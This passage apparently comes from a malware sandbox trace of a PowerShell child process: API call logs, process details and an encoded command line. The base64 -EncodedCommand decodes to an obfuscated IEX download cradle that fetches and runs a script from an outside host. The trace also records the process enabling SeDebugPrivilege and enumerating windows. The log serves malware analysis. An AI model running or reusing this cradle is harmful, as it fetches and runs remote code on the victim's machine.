JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x2f923e8*(hProcess=0x360, hThread=0x35c, dwProcessId=0x9b8, dwThreadId=0xad4)) returned 1
	[0359.587] CoTaskMemFree (pv=0x1b7bfed0) 
	[0359.589] CloseHandle (hObject=0x35c) returned 1
	[0359.589] CoTaskMemAlloc (cb=0x3b) returned 0x1b7d45a0
	[0359.589] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c80e1a8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c80e1a8) returned 0x4550
	[0359.589] CoTaskMemFree (pv=0x1b7d45a0) 
	[0359.592] GetCurrentProcess () returned 0xffffffffffffffff
	[0359.592] GetCurrentProcess () returned 0xffffffffffffffff
	[0359.593] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x360, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c80e288, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c80e288*=0x35c) returned 1

Process:
	id = "19"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x2d911000"
	os_pid = "0x5a4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 110
	os_tid = 0x3d0

	[0296.125] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0298.248] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0298.248] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0298.248] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0298.248] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0303.908] GetVersionExW (in: lpVersionInformation=0x1ad940*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ad940*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0303.910] GetVersionExW (in: lpVersionInformation=0x1ad940*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ad940*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0303.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.810] GetVersionExW (in: lpVersionInformation=0x1ad6b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1ad6b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0304.811] SetErrorMode (uMode=0x1) returned 0x1
	[0304.828] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1ad810 | out: lpFileInformation=0x1ad810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0304.829] SetErrorMode (uMode=0x1) returned 0x1
	[0304.832] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1ada80 | out: lpdwHandle=0x1ada80) returned 0x94c
	[0304.834] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c872d8 | out: lpData=0x2c872d8) returned 1
	[0304.836] VerQueryValueW (in: pBlock=0x2c872d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ad9f8, puLen=0x1ad9f0 | out: lplpBuffer=0x1ad9f8*=0x2c87374, puLen=0x1ad9f0) returned 1
	[0304.839] lstrlenW (lpString="䅁") returned 1
	[0304.848] VerQueryValueW (in: pBlock=0x2c872d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1ad968, puLen=0x1ad960 | out: lplpBuffer=0x1ad968*=0x2c87450, puLen=0x1ad960) returned 1
	[0304.848] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0304.850] CoTaskMemAlloc (cb=0x2e) returned 0x46ed10
	[0304.850] lstrcpyW (in: lpString1=0x46ed10, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0304.851] CoTaskMemFree (pv=0x46ed10) 
	[0304.851] VerQueryValueW (in: pBlock=0x2c872d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1ad968, puLen=0x1ad960 | out: lplpBuffer=0x1ad968*=0x2c874a4, puLen=0x1ad960) returned 1
	[0304.851] lstrlenW (lpString="System.Management.Automation") returned 28
	[0304.851] CoTaskMemAlloc (cb=0x3c) returned 0x3e9110
	[0304.851] lstrcpyW (in: lpString1=0x3e9110, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0304.851] CoTaskMemFree (pv=0x3e9110) 
	[0304.851] VerQueryValueW (in: pBlock=0x2c872d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1ad968, puLen=0x1ad960 | out: lplpBuffer=0x1ad968*=0x2c87500, puLen=0x1ad960) returned 1
	[0304.851] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0304.851] CoTaskMemAlloc (cb=0x20) returned 0x470b10
	[0304.851] lstrcpyW (in: lpString1=0x470b10, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0304.851] CoTaskMemFree (pv=0x470b10) 
	[0304.851] VerQueryValueW (in: pBlock=0x2c872d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1ad968, puLen=0x1ad960 | out: lplpBuffer=0x1ad968*=0x2c87540, puLen=0x1ad960) returned 1
	[0304.852] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0304.852] CoTaskMemAlloc (cb=0x44) returned 0x3e9110
	[0304.852] lstrcpyW (in: lpString1=0x3e9110, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0304.852] CoTaskMemFree (pv=0x3e9110) 
	[0304.852] VerQueryValueW (in: pBlock=0x2c872d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1ad968, puLen=0x1ad960 | out: lplpBuffer=0x1ad968*=0x2c875a8, puLen=0x1ad960) returned 1
	[0304.852] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0304.852] CoTaskMemAlloc (cb=0x76) returned 0x4191e0
	[0304.852] lstrcpyW (in: lpString1=0x4191e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0304.852] CoTaskMemFree (pv=0x4191e0) 
	[0304.852] VerQueryValueW (in: pBlock=0x2c872d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1ad968, puLen=0x1ad960 | out: lplpBuffer=0x1ad968*=0x2c87644, puLen=0x1ad960) returned 1
	[0304.852] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0304.852] CoTaskMemAlloc (cb=0x44) returned 0x3e9110
	[0304.852] lstrcpyW (in: lpString1=0x3e9110, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0304.852] CoTaskMemFree (pv=0x3e9110) 
	[0304.852] VerQueryValueW (in: pBlock=0x2c872d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1ad968, puLen=0x1ad960 | out: lplpBuffer=0x1ad968*=0x2c876a8, puLen=0x1ad960) returned 1
	[0304.852] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0304.852] CoTaskMemAlloc (cb=0x58) returned 0x436760
	[0304.852] lstrcpyW (in: lpString1=0x436760, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0304.852] CoTaskMemFree (pv=0x436760) 
	[0304.852] VerQueryValueW (in: pBlock=0x2c872d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1ad968, puLen=0x1ad960 | out: lplpBuffer=0x1ad968*=0x2c87724, puLen=0x1ad960) returned 1
	[0304.852] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0304.852] CoTaskMemAlloc (cb=0x20) returned 0x470b10
	[0304.852] lstrcpyW (in: lpString1=0x470b10, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0304.852] CoTaskMemFree (pv=0x470b10) 
	[0304.852] VerQueryValueW (in: pBlock=0x2c872d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1ad968, puLen=0x1ad960 | out: lplpBuffer=0x1ad968*=0x2c873cc, puLen=0x1ad960) returned 1
	[0304.852] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0304.852] CoTaskMemAlloc (cb=0x66) returned 0x3ec280
	[0304.852] lstrcpyW (in: lpString1=0x3ec280, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0304.852] CoTaskMemFree (pv=0x3ec280) 
	[0304.852] VerQueryValueW (in: pBlock=0x2c872d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1ad968, puLen=0x1ad960 | out: lplpBuffer=0x1ad968*=0x0, puLen=0x1ad960) returned 0
	[0304.852] VerQueryValueW (in: pBlock=0x2c872d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1ad968, puLen=0x1ad960 | out: lplpBuffer=0x1ad968*=0x0, puLen=0x1ad960) returned 0
	[0304.852] VerQueryValueW (in: pBlock=0x2c872d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1ad968, puLen=0x1ad960 | out: lplpBuffer=0x1ad968*=0x0, puLen=0x1ad960) returned 0
	[0304.852] VerQueryValueW (in: pBlock=0x2c872d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ad938, puLen=0x1ad930 | out: lplpBuffer=0x1ad938*=0x2c87374, puLen=0x1ad930) returned 1
	[0304.853] CoTaskMemAlloc (cb=0x204) returned 0x414ed0
	[0304.853] VerLanguageNameW (in: wLang=0x0, szLang=0x414ed0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0304.855] CoTaskMemFree (pv=0x414ed0) 
	[0304.855] VerQueryValueW (in: pBlock=0x2c872d8, lpSubBlock="\\", lplpBuffer=0x1ad988, puLen=0x1ad980 | out: lplpBuffer=0x1ad988*=0x2c87300, puLen=0x1ad980) returned 1
	[0305.835] GetCurrentProcessId () returned 0x5a4
	[0305.847] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1ac8b0 | out: lpLuid=0x1ac8b0*(LowPart=0x14, HighPart=0)) returned 1
	[0305.849] GetCurrentProcess () returned 0xffffffffffffffff
	[0305.850] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1ac8d0 | out: TokenHandle=0x1ac8d0*=0x2d8) returned 1
	[0305.850] AdjustTokenPrivileges (in: TokenHandle=0x2d8, DisableAllPrivileges=0, NewState=0x2c8ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0305.851] CloseHandle (hObject=0x2d8) returned 1
	[0305.855] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5a4) returned 0x2d8
	[0305.861] EnumProcessModules (in: hProcess=0x2d8, lphModule=0x2c8abb8, cb=0x200, lpcbNeeded=0x1ad8e8 | out: lphModule=0x2c8abb8, lpcbNeeded=0x1ad8e8) returned 1
	[0305.863] GetModuleInformation (in: hProcess=0x2d8, hModule=0x13f370000, lpmodinfo=0x2c8ae28, cb=0x18 | out: lpmodinfo=0x2c8ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0305.864] CoTaskMemAlloc (cb=0x804) returned 0x472e80
	[0305.864] GetModuleBaseNameW (in: hProcess=0x2d8, hModule=0x13f370000, lpBaseName=0x472e80, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0305.864] CoTaskMemFree (pv=0x472e80) 
	[0305.865] CoTaskMemAlloc (cb=0x804) returned 0x472e80
	[0305.865] GetModuleFileNameExW (in: hProcess=0x2d8, hModule=0x13f370000, lpFilename=0x472e80, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0305.865] CoTaskMemFree (pv=0x472e80) 
	[0305.866] CloseHandle (hObject=0x2d8) returned 1
	[0306.779] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x5a4) returned 0x2d8
	[0306.780] GetExitCodeProcess (in: hProcess=0x2d8, lpExitCode=0x1ada18 | out: lpExitCode=0x1ada18*=0x103) returned 1
	[0306.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c8b088, Length=0x20000, ResultLength=0x1ad9e0 | out: SystemInformation=0x12c8b088, ResultLength=0x1ad9e0*=0x16888) returned 0x0
	[0306.799] EnumWindows (lpEnumFunc=0x2c066ac, lParam=0x0) returned 1
	[0306.800] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0309.273] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x558
	[0310.397] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0310.960] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0311.489] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.378] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x538
	[0312.986] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.986] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x778
	[0312.986] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x778
	[0312.986] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.986] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.986] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.987] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.987] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.987] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.987] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.987] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.987] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x460
	[0312.987] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.987] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.987] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xc84
	[0312.987] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xca4
	[0312.988] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xc64
	[0312.988] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xc24
	[0312.988] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xb84
	[0312.988] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xbac
	[0312.988] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x384
	[0312.988] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xab8
	[0312.988] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x33c
	[0312.988] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xa44
	[0312.988] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xa64
	[0312.989] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x8a8
	[0312.989] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xaf0
	[0312.989] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x88c
	[0312.989] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xb04
	[0312.989] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x910
	[0312.989] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x230
	[0312.989] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xac0
	[0312.989] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xab4
	[0312.989] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xaac
	[0312.990] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x3d0
	[0312.990] GetWindow (hWnd=0x10252, uCmd=0x4) returned 0x0
	[0312.991] IsWindowVisible (hWnd=0x10252) returned 0
	[0312.991] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x978
	[0312.991] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xa7c
	[0312.991] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x59c
	[0312.991] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xa88
	[0312.992] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xa6c
	[0312.992] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xa68
	[0312.992] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x9f8
	[0312.992] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xa04
	[0312.992] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x924
	[0312.992] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x8dc
	[0312.992] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x7dc
	[0312.992] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x768
	[0312.992] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x764
	[0312.992] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x820
	[0312.992] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x810
	[0312.993] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x794
	[0312.993] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x83c
	[0312.993] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x7ac
	[0312.993] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xb44
	[0312.993] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0xb5c
	[0312.993] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x838
	[0312.993] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.993] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.993] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.993] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.993] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.994] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.994] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.994] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x4d0
	[0312.994] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x818
	[0312.994] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x5b8
	[0312.994] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1ad740 | out: lpdwProcessId=0x1ad740) returned 0x494
